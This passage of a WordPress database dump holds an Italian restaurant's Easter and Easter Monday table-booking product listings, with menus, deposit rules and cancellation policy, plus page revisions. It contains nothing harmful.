carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 3 Persone - Pasquetta','Prenotazione tavolo per 3 persone per il giorno di Pasquetta','publish','closed','closed','','prenotazione-tavolo-per-3-persone-pasquetta','','','2019-04-13 18:34:30','2019-04-13 16:34:30','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasquetta/',1,'product','',0),(329,1,'2017-03-22 20:48:56','2017-03-22 19:48:56','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 4 persone giorno di Pasquetta 2019 - anticipo caparra confirmatoria. La caparra si intende per 4 persone (30euro x 4)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 4 Persone - Pasquetta','Prenotazione tavolo per 4 persone per il giorno di Pasquetta','publish','closed','closed','','prenotazione-tavolo-per-4-persone-pasquetta','','','2019-04-20 11:26:58','2019-04-20 09:26:58','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasquetta/',1,'product','',0),(330,1,'2017-03-22 20:55:29','2017-03-22 19:55:29','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/03/easter.jpeg\" alt=\"\" width=\"284\" height=\"177\" class=\"alignright size-full wp-image-336\" /><em>Oh, i bei rami d’ulivo! chi ne vuole?\r\nSon benedetti, li ha baciati il sole.\r\nIn queste foglioline tenerelle\r\nvi sono scritte tante cose belle.\r\nSull’uscio, alla finestra, accanto al letto\r\nmetteteci l’ulivo benedetto!\r\nCome la luce e le stelle serene:\r\nun po’ di pace ci fa tanto bene.</em>\r\n\r\n<h2>Menù di Pasqua</h2>\r\n<em>Tataky di palamita con caramello alla soia e topinambur\r\nInsalatina di granciporro con guacamole all\'arancio e cocco\r\nClub sandwich di sgombro , mucchino di Sanpatrignano e zucchine grigliate\r\nLinguine del pastificio mancini al bianco di ombrina, capperi, limone e pistacchio\r\nMerluzzo in tempura con insalatina di puntarelle con alici del cantabrico e bufala\r\nVariazione di cioccolato\r\n50€ a persona escluse bevande</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta, da 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n<h2>Menù di Pasquetta</h2>\r\nIl pranzo di pasquetta è alla carta\r\n\r\n\r\n<h3>Regolamento</h3>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze. La prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 14 aprile(per la prenotazione di domenica)ed entro le 12,00 di sabato 15 aprile (per la prenotazione di lunedì) solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata verrà trattenuta in caso di no show.Nel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show\r\nLa ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\n<h2>Prenotazione Pasqua</h2>\r\n[product_category category=\"pasqua\" number=\"10\"]\r\n\r\n<h2>Prenotazione Pasquetta</h2>\r\n[product_category category=\"pasquetta\" number=\"10\"]','Menù Pasqua e Pasquetta 2017','','publish','open','open','','menu-pasqua-pasquetta-2017','','','2017-03-22 23:56:48','2017-03-22 22:56:48','',0,'http://www.ristorantesolymar.it/?p=330',0,'post','',0),(331,1,'2017-03-22 20:51:07','2017-03-22 19:51:07','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 6 persone giorno di Pasquetta 2019 - anticipo caparra confirmatoria. La caparra si intende per 6 persone (30euro x 6)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n','Prenotazione Tavolo per 6 Persone - Pasquetta','Prenotazione tavolo per 6 persone per il giorno di Pasquetta','publish','closed','closed','','prenotazione-tavolo-per-6-persone-pasquetta','','','2019-04-03 22:22:02','2019-04-03 20:22:02','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone-pasquetta/',1,'product','',0),(332,1,'2017-03-22 20:55:29','2017-03-22 19:55:29','<em>Oh, i bei rami d’ulivo! chi ne vuole?\r\nSon benedetti, li ha baciati il sole.\r\nIn queste foglioline tenerelle\r\nvi sono scritte tante cose belle.\r\nSull’uscio, alla finestra, accanto al letto\r\nmetteteci l’ulivo benedetto!\r\nCome la luce e le stelle serene:\r\nun po’ di pace ci fa tanto bene.</em>\r\n\r\n<h2>Menù di Pasqua</h2>\r\nTataky di palamita con caramello alla soia e topinambur\r\nInsalatina di granciporro con guacamole all\'arancio e cocco\r\nClub sandwich di sgombro , mucchino di Sanpatrignano e zucchine grigliate\r\nLinguine del pastificio mancini al bianco di ombrina, capperi, limone e pistacchio\r\nMerluzzo in tempura con insalatina di puntarelle con alici del cantabrico e bufala\r\nVariazione di cioccolato\r\n50€ a persona escluse bevande\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta, da 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n<h2>Menù di Pasquetta</h2>\r\nIl pranzo di pasquetta è alla carta\r\n\r\n\r\nRegolamento prenotazioni\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze. La prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 14 aprile(per la prenotazione di domenica)ed entro le 12,00 di sabato 15 aprile (per la prenotazione di lunedì) solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata verrà trattenuta in caso di no show.Nel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show\r\nLa ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\n<h2>Prenotazione Pasqua</h2>\r\n[product_category category=\"pasquetta\"]\r\n\r\n<h2>Prenotazione Pasquetta</h2>\r\n[product_category category=\"pasquetta\"]','Menù Pasqua e Pasquetta 2017','','inherit','closed','closed','','330-revision-v1','','','2017-03-22 20:55:29','2017-03-22 19:55:29','',330,'http://www.ristorantesolymar.it/2017/03/22/330-revision-v1/',0,'revision','',0),(333,1,'2017-03-22 20:55:58','2017-03-22 19:55:58','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 7 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (30euro x 7)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 7 Persone - Pasqua','Tavolo per 7 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 7 persone (30euro x 7)','publish','closed','closed','','prenotazione-tavolo-per-7-persone-pasqua','','','2019-04-04 22:07:38','2019-04-04 20:07:38','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasqua/',1,'product','',0),(334,1,'2017-03-22 20:57:08','2017-03-22 19:57:08','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 8 persone giorno di Pasquetta 2019 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (30euro x 8)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 8 Persone - Pasquetta','Tavolo per 8 persone giorno di Pasquetta - anticipo caparra confirmatoria. La caparra si intende per 8 persone (30euro x 8)','publish','closed','closed','','prenotazione-tavolo-per-8-persone-pasquetta','','','2019-04-09 23:30:16','2019-04-09 21:30:16','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasqua-2/',1,'product','',0),(335,1,'2017-03-22 23:56:43','2017-03-22 22:56:43','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/03/easter.jpeg\" alt=\"\" width=\"284\" height=\"177\" class=\"alignright size-full wp-image-336\" /><em>Oh, i bei rami d’ulivo! chi ne vuole?\nSon benedetti, li ha baciati il sole.\nIn queste foglioline tenerelle\nvi sono scritte tante cose belle.\nSull’uscio, alla finestra, accanto al letto\nmetteteci l’ulivo benedetto!\nCome la luce e le stelle serene:\nun po’ di pace ci fa tanto bene.</em>\n\n<h2>Menù di Pasqua</h2>\n<em>Tataky di palamita con caramello alla soia e topinambur\nInsalatina di granciporro con guacamole all\'arancio e cocco\nClub sandwich di sgombro , mucchino di Sanpatrignano e zucchine grigliate\nLinguine del pastificio mancini al bianco di ombrina, capperi, limone e pistacchio\nMerluzzo in tempura con insalatina di puntarelle con alici del cantabrico e bufala\nVariazione di cioccolato\n50€ a persona escluse bevande</em>\n\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta, da 7 a 14 menù bambini a 25€\nDa 15 anni menù grandi\n\n<h2>Menù di Pasquetta</h2>\nIl pranzo di pasquetta è alla carta\n\n\n<h3>Regolamento</h3>\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze. La prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 14 aprile(per la prenotazione di domenica)ed entro le 12,00 di sabato 15 aprile (per la prenotazione di lunedì) solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata verrà trattenuta in caso di no show.Nel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show\nLa ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\nGrazie per la comprensione\nTeo & Barbara\n\n<h2>Prenotazione Pasqua</h2>\n[product_category category=\"pasqua\" number=\"10\"]\n\n<h2>Prenotazione Pasquetta</h2>\n[product_category category=\"pasquetta\" number=\"10\"]','Menù Pasqua e Pasquetta 2017','','inherit','closed','closed','','330-autosave-v1','','','2017-03-22 23:56:43','2017-03-22 22:56:43','',330,'http://www.ristorantesolymar.it/2017/03/22/330-autosave-v1/',0,'revision','',0),(336,1,'2017-03-22 21:00:36','2017-03-22 20:00:36','','easter','','inherit','open','closed','','easter','','','2017-03-22 21:00:36','2017-03-22 20:00:36','',330,'http://www.ristorantesolymar.it/wp-content/uploads/2017/03/easter.jpeg',0,'attachment','image/jpeg',0),(337,1,'2017-03-22 21:00:39','2017-03-22 20:00:39','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 5 persone giorno di Pasquetta 2019 - anticipo caparra confirmatoria. La caparra si intende per 5 persone (30euro x 5)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 5 Persone - Pasquetta','Tavolo per 5 persone giorno di Pasquetta - anticipo caparra confirmatoria. La caparra si intende per 5 persone (30euro x 5)','publish','closed','closed','','prenotazione-tavolo-per-7-persone-pasquetta','','','2019-04-06 15:20:37','2019-04-06 13:20:37','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasquetta/',1,'product','',0),(338,1,'2017-03-22 21:01:51','2017-03-22 20:01:51','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/03/easter.jpeg\" alt=\"\" width=\"284\" height=\"177\" class=\"alignright size-full wp-image-336\" /><em>Oh, i bei rami d’ulivo! chi ne vuole?\r\nSon benedetti, li ha baciati il sole.\r\nIn queste foglioline tenerelle\r\nvi sono scritte tante cose belle.\r\nSull’uscio, alla finestra, accanto al letto\r\nmetteteci l’ulivo benedetto!\r\nCome la luce e le stelle serene:\r\nun po’ di pace ci fa tanto bene.</em>\r\n\r\n<h2>Menù di Pasqua</h2>\r\n<em>Tataky di palamita con caramello alla soia e topinambur\r\nInsalatina di granciporro con guacamole all\'arancio e cocco\r\nClub sandwich di sgombro , mucchino di Sanpatrignano e zucchine grigliate\r\nLinguine del pastificio mancini al bianco di ombrina, capperi, limone e pistacchio\r\nMerluzzo in tempura con insalatina di puntarelle con alici del cantabrico e bufala\r\nVariazione di cioccolato\r\n50€ a persona escluse bevande</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta, da 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n<h2>Menù di Pasquetta</h2>\r\nIl pranzo di pasquetta è alla carta\r\n\r\n\r\n<h3>Regolamento</h3>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze. La prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 14 aprile(per la prenotazione di domenica)ed entro le 12,00 di sabato 15 aprile (per la prenotazione di lunedì) solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata verrà trattenuta in caso di no show.Nel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show\r\nLa ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\n<h2>Prenotazione Pasqua</h2>\r\n[product_category category=\"pasquetta\"]\r\n\r\n<h2>Prenotazione Pasquetta</h2>\r\n[product_category category=\"pasquetta\"]','Menù Pasqua e Pasquetta 2017','','inherit','closed','closed','','330-revision-v1','','','2017-03-22 21:01:51','2017-03-22 20:01:51','',330,'http://www.ristorantesolymar.it/2017/03/22/330-revision-v1/',0,'revision','',0),(340,1,'2017-03-22 21:05:27','2017-03-22 20:05:27','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/03/easter.jpeg\" alt=\"\" width=\"284\" height=\"177\" class=\"alignright size-full wp-image-336\" /><em>Oh, i bei rami d’ulivo! chi ne vuole?\r\nSon benedetti, li ha baciati il sole.\r\nIn queste foglioline tenerelle\r\nvi sono scritte tante cose belle.\r\nSull’uscio, alla finestra, accanto al letto\r\nmetteteci l’ulivo benedetto!\r\nCome la luce e le stelle serene:\r\nun po’ di pace ci fa tanto bene.</em>\r\n\r\n<h2>Menù di Pasqua</h2>\r\n<em>Tataky di palamita con caramello alla soia e topinambur\r\nInsalatina di granciporro con guacamole all\'arancio e cocco\r\nClub sandwich di sgombro , mucchino di Sanpatrignano e zucchine grigliate\r\nLinguine del pastificio mancini al bianco di ombrina, capperi, limone e pistacchio\r\nMerluzzo in tempura con insalatina di puntarelle con alici del cantabrico e bufala\r\nVariazione di cioccolato\r\n50€ a persona escluse bevande</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta, da 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n<h2>Menù di Pasquetta</h2>\r\nIl pranzo di pasquetta è alla carta\r\n\r\n\r\n<h3>Regolamento</h3>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze. La prenotazione si 